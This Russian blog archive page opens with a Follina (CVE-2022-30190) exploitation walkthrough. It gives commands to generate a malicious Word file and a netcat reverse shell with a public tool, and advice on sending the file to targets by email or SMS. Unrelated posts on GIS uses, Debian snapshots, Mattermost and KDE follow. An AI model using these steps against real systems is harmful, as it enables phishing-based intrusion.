Архив автора: admin

💻 Follina – Уязвимость Microsoft MSDT

На компьютерах под управлением Windows мы используем различные продукты компании Microsoft.

Для этого существует инструмент под названием MSDT (Microsoft Support Diagnostic Tool).

Исследователь кибербезопасности “Kevin Beaumont” нашел в MSDT брешь безопасности (она уже использовалась) и сообщил об этом.

Он назвал его “Follina”.

Давайте узнаем об этом.

Что такое MSDT?

Microsoft Support Diagnostic Tool (MSDT) собирает информацию для отправки в службу поддержки Microsoft.

Затем служба поддержки Microsoft анализирует собранную информацию и использует ее для решения любых проблем, которые могут возникнуть на нашем компьютере.

По сути, программа собирает данные с нашей системы и отправляет их в службу поддержки Microsoft.

Это мастер диагностики и устранения неполадок Microsoft.

Он существует как установленный инструмент в папке “C:WindowsSystem32” начиная с Windows 7.

Что такое Follina?

Компания Microsoft признала, что в ее приложении MSDT обнаружен новый дефект нулевого дня RCE (Remote Code Execution).

Он получил название Follina.

Follina – это уязвимость удаленного выполнения кода, возникающая при вызове MSDT по протоколу URL из вызывающего приложения, такого как Word.

Злоумышленник, успешно использующий эту уязвимость, может выполнить произвольный код с привилегиями вызывающего приложения.

Затем злоумышленник может устанавливать программы, просматривать, изменять или удалять данные, а также создавать новые учетные записи в контексте, разрешенном правами пользователя.

Злоумышленник может получить доступ к привилегиям пользователя с помощью любого приложения или даже оболочки.

Злоумышленник может устанавливать программы, просматривать, изменять, удалять данные или создавать новые учетные записи с привилегиями пользователя. CVE-номер Follina – CVE-2022-30190.

Давайте на этом прекратим обсуждение, а теперь перейдем к практическому использованию этого эксплойта.

Предупреждение:- Эта статья предназначена только для образовательных целей. Мы сделали это на нашей собственной системе и никому не вредим. Делайте вещи на своей собственной системе и никогда не компрометируйте чужую систему без соответствующих письменных предпосылок. Мы не поддерживаем никакую незаконную деятельность.

Исследование Follina

Как мы узнали, это уязвимость MSDT (Microsoft Support Diagnostic Tool).

Это означает, что система будет затронута Microsoft Windows, поэтому нам нужна система Windows на VirtualBox или Vmware, а в качестве атакующей машины мы будем использовать Kali Linux.

Теперь на нашей атакующей машине (Kali Linux) нам нужно клонировать репозиторий Follina Джона Хаммонда с GitHub, применив следующую команду:

git clone https://github.com/JohnHammond/msdt-follina

На следующем снимке экрана мы видим результат выполнения команды:

Теперь нам нужно переместиться в наш только что клонированный каталог с помощью следующей команды:

cd msdt-follina

Теперь нам просто нужно применить следующую команду:

python3 follina.py -i X.X.X.X

В приведенной выше команде X.X.X.X – это наш IP-адрес.

Теперь на следующем снимке экрана мы видим, что наш вредоносный doc-файл создан и запускает приемник для своей HTML полезной нагрузки на порту 8000.

Теперь мы можем увидеть вредоносный файл (внутри каталога msdt-follina), как показано на следующем снимке экрана:

Нам нужно отправить его в систему Windows нашей цели.

Мы можем отправить его по почте или сочное SMS со ссылкой на скачивание вредоносного DOC-файла.

Мы разместили его на нашем децентрализованном облачном хранилище.

(Чтобы использовать его извне, нам нужно использовать наш внешний IP и пробросить необходимый порт).

Всякий раз, когда наша целевая система Windows открывает его и нажимает кнопку “Включить редактирование” в MS Word (более старые версии MS Office не требуют этого, мы можем получить их напрямую), мы получим обратное соединение с нашей Kali Linux.

По умолчанию скрипт Джона просто открывает калькулятор на Windows.

Но он может сделать гораздо больше, если мы создадим полезную нагрузку с помощью следующей команды, тогда мы даже сможем получить shell:

python3 follina.py -r 7777

В приведенной выше команде мы используем порт 7777 для установления соединения с полезной нагрузкой, здесь мы можем использовать любой неиспользуемый порт.

Приведенная выше команда создаст полезную нагрузку Netcat и запустит слушателя, а также создаст файл DOC в каталоге msdt-follina.

Теперь мы можем делать все, что может делать пользователь компьютера-жертвы.

Эта уязвимость вряд ли будет исправлена, по крайней мере, в течение последней недели.

¯_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.



2022-06-16T17:19:39
Закрытие уязвимостей

20 способов использования данных ГИС в бизнесе и повседневной жизни

Какова важность данных ГИС?

Географические информационные системы (ГИС) имеют различные промышленные применения, а технологические достижения значительно улучшили данные ГИС, особенно то, как их можно использовать и чего можно достичь в результате.

Географические информационные системы, такие как https://nextgis.ru/, являются мощным инструментом принятия решений для любого бизнеса или отрасли, поскольку они позволяют анализировать экологические, демографические и топографические данные. Интеллектуальные данные, собранные из приложений ГИС, помогают компаниям и различным отраслям, а также потребителям принимать обоснованные решения.

Nextgis можно собрать полноценную Веб ГИС за пару минут в браузере. Загрузите в ГИС свои геоданные. Создавайте неограниченное количество веб карт. Работайте со своими геоданными вместе с коллегами и друзьями из любой точки планеты.

Nextgis предлагает несколько продуктов:

  • NextGIS Web — Хранение, визуализация и управление геоданными;
  • NextGIS QGIS — ГИС для ПК, создание и редактирование данных, производства карт и выполнения аналитических операций;
  • NextGIS Mobile — Мобильная ГИС, позволяющая создавать, редактировать и выгружать геоданные онлайн и оффлайн;
  • NextGIS Data — Геоданные в различных форматах. Удобная структура слоев, стили и проекты.

 

Главные преимущества Nextgis:

  • Профессионализм
  • Индивидуальный подход
  • Универсальность
  • Сделано в России

 

Вот 20 способов использования данных ГИС в бизнесе и повседневной жизни:

1. Отображение

ГИС можно использовать для обеспечения визуальной интерпретации данных. Карты Yandex — отличный пример картографического веб-решения ГИС, которое люди используют для повседневных целей навигации. Тем не менее, технология интеллектуального картографирования значительно продвинулась вперед и используется в таких продуктах, как NextGIS, который позволяет городам, муниципалитетам и частному сектору всесторонне изучить электроэнергетические и водные активы района в полевых условиях.

2. Телекоммуникационные и сетевые услуги

Организации могут включать географические данные в свою сложную сетевую деятельность по проектированию, оптимизации, планированию и обслуживанию. Эти данные улучшают телекоммуникационные процессы за счет более эффективного управления взаимоотношениями с клиентами и услуг определения местоположения.

3. Анализ аварий и анализ горячих точек

Данные ГИС помогают определять места аварий , а дорожные сети можно оптимизировать с помощью анализа данных. Этот интеллект помогает улучшить меры безопасности дорожного движения и позволяет лучше управлять дорожным движением.

4. Городское планирование

Данные G IS анализируют рост городов и направление расширения. При правильном применении он может открывать новые участки для дальнейшего развития с учетом различных факторов, необходимых для успешного строительства.

5. Планирование транспортировки

Данные ГИС обычно используются для управления транспортными проблемами. С добавлением экологических и актуальных данных на платформу ГИС компании могут планировать новый автомобильный или железнодорожный маршрут.

6. Анализ воздействия на окружающую среду

Данные, собранные с помощью приложений ГИС, жизненно важны для сохранения природных ресурсов и защиты окружающей среды. Заявления о воздействии оценивают величину воздействия человека на окружающую среду , что помогает указать интеграция ГИС.

7. Сельскохозяйственные приложения

Данные ГИС помогают создавать более эффективные методы ведения сельского хозяйства, наряду с расширенным анализом данных о почве. Это может увеличить производство продуктов питания в разных частях мира.

8. Управление стихийными бедствиями и смягчение их последствий

Эффективные ГИС-системы защищают окружающую среду и разрабатываются для помощи в управлении рисками и стихийными бедствиями.

9. Навигация

Веб-навигационные карты используют данные ГИС для предоставления общественности полезной информации. Веб-карты регулярно обновляются в соответствии с информацией ГИС и постоянно используются в повседневной жизни.

10. Оценка ущерба от наводнения

Правительства используют данные ГИС для картирования районов риска наводнений и могут использовать эту информацию для координации усилий по оказанию помощи.

11. Управление природными ресурсами

С помощью информации ГИС можно надлежащим образом поддерживать и управлять лесами. Это особенно важно для распределения и географического распределения воды, одного из наиболее важных компонентов окружающей среды .

12. Банковское дело

Банковское дело эволюционировало, чтобы стать управляемым рынком, и успех банка зависит главным образом от его способности предоставлять услуги, ориентированные на клиента. Данные ГИС играют важную роль в планировании, организации и принятии решений в банковской сфере.

13. Налогообложение

Данные ГИС помогают решать проблемы налогообложения и максимизировать доходы государства . Он используется для получения разрешений на строительство и проектирования и предлагает систему управления налогом на недвижимость на географической основе.

14. Геодезия

Съемка включает в себя измерение местоположения объектов на земле, и все больше организаций используют для этой функции глобальные навигационные спутниковые системы (GNSS). Эти данные, включенные в систему ГИС, позволяют оценить площадь и подготовить цифровые карты.

15. Геология

Геологи используют данные ГИС для анализа почвы , оценки сейсмической информации и создания трехмерных изображений географических объектов. Его также можно использовать для анализа характеристик горных пород и определения наилучшего местоположения для различных функций.

16. Управление активами и техническое обслуживание

Данные ГИС помогают организациям стать более эффективными с ограниченными ресурсами. Понимая группу риска, специалисты по планированию могут более эффективно распределять ресурсы.

17. Планирование и развитие сообщества

Данные ГИС помогают нам понимать глобальные проблемы и решать их. Поскольку технология ГИС быстро развивается, в секторе планирования появляются различные инновационные приложения. Инструменты ГИС можно использовать для интеграции географической информации в процессы планирования, и они могут изменить наше мышление и поведение.

18. Молочная промышленность

Молочная промышленность использует данные ГИС для распределения, производства и определения местоположения магазинов. Это полезный инструмент для планирования в области управления молочной фермой, позволяющий лучше принимать решения.

19. Управление оросительной водой

Доступность воды напрямую влияет на урожайность в данном регионе. Данные ГИС могут идентифицировать важные культуры и определять урожайность, используя эффективные методы для пространственной и временной области.

20. Борьба с вредителями и борьба с ними

Борьба с вредителями имеет важное значение для сельскохозяйственного производства, и технология ГИС играет жизненно важную роль в картировании зараженных территорий. Следовательно, организации могут разрабатывать более эффективные планы борьбы с вредителями.

 

В итоге

Использование данных ГИС оказывает глубокое влияние на бизнес и промышленность, а также на общество в целом. Если бы эта технология была упразднена, мы бы в значительной степени осознали огромную важность данных ГИС в нашей повседневной жизни и в работе.

к вам

Как вы используете данные ГИС в своей жизни или работе? Дайте нам знать в комментариях ниже.



2022-06-16T14:23:07
Бизнес

Снапшоты репозиториев debian

У репозиториев Debian есть официальные снапшоты репозиториев. В этой небольшой заметке я покажу что это такое и как этим можно пользоваться.





Читать

Mattermost 7.0 уже выпущен, и это его новости

Mattermost

Недавно анонсирован выход новой версии Mattermost 7.0, ориентированный на обеспечение связи между разработчиками и сотрудниками компании.

Mattermost позиционирует себя как открытая альтернатива системе коммуникаций Slack и позволяет получать и отправлять сообщения, файлы и изображения, отслеживать историю разговоров и получать уведомления на смартфон или ПК.



Читать

KDE Plasma 5.25 выходит полным новостей, улучшений, исправлений и многого другого

Команда разработчиков KDE Plasma выпустила недавно вышел вариант среды рабочего стола KDE Plasma 5.25 в которомl Он переопределяет и улучшает способ навигации между окнами и рабочими пространствами. и это то, что в этой новой версии эффект обзора показывает все открытые окна и их виртуальные рабочие столы.

Также стоит отметить, что с помощью KRunner и Панели запуска приложений можно искать приложения, документы и вкладки браузера, а также добавлять, удалять и переименовывать виртуальные рабочие столы.



Читать

KDE Plasma 5.25 выходит полным новостей, улучшений, исправлений и многого другого

Команда разработчиков KDE Plasma выпустила недавно вышел вариант среды рабочего стола KDE Plasma 5.25 в которомl Он переопределяет и улучшает способ навигации между окнами и рабочими пространствами. и это то, что в этой новой версии эффект обзора показывает все открытые окна и их виртуальные рабочие столы.

Также стоит отметить, что с помощью KRunner и Панели запуска приложений можно искать приложения, документы и вкладки браузера, а также добавлять, удалять и переименовывать виртуальные рабочие столы.



Читать